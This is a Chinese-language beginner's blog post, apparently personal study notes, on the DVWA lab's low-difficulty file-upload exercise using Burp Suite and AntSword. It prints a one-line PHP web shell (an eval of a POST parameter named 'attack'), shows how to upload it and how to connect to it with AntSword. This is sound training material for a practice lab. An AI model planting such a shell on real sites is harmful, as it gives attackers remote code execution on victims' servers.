DVWA靶场文件上传

我们之前说过DVWA靶场，在此我们就不过多介绍了（如果想了解DVWA靶场的话，可以看看我之前发的博文）我也是个初学者，在此，写的不好，希望大家多多包涵，如果写的有错误，有出入的话，希望大家及时纠正，我立马改正，感谢各位!!!

工具介绍：

Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

    

   AntSword（中国蚁剑）中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑采用了Electron作为外壳，ES6作为前端代码编写语言，搭配Babel&&Webpack进行组件化构建编译，外加iconv-lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块，组成了这个年轻而又充满活力的新一代大杀器。

工具介绍完，我们开始DVWA靶场进行文件上传

在做实验之前我们需要设置浏览器，手动配置代理

本机地址：127.0.0.1

www代劳服务端口：8080

配置完后：

打开DVWA靶场：

我们选择难度等级low

我们进行文件上传

所上传的文件为一句话木马：

<?php @eval($_POST['attack']);?>  //一句话木马

上传以后下面会生成一行红字：

前面为路径，后面是successfully upload！表示上传成功

将网址#删去，然后将successfully upload！前面的路径复制过去，

如图所示：

复制完成后;

可以进入如下页面：

我们文件上传成功

我们使用Burp Suite 进行抓取，抓取结果如下所示：

我们使用AntSword连接本机地址

打开中国蚁剑：

输入我们复制文件上传成功页面的网址

密码为一句话木马中<?php @eval($_POST['attack']);?>

attack；

点击测试连接

我们就可以连接上了！右下角会显示连接成功;

今天就写到这吧

备注：如有错误，请谅解！

此文章为本人学习笔记，仅供参考！如有重复！！！请联系本人！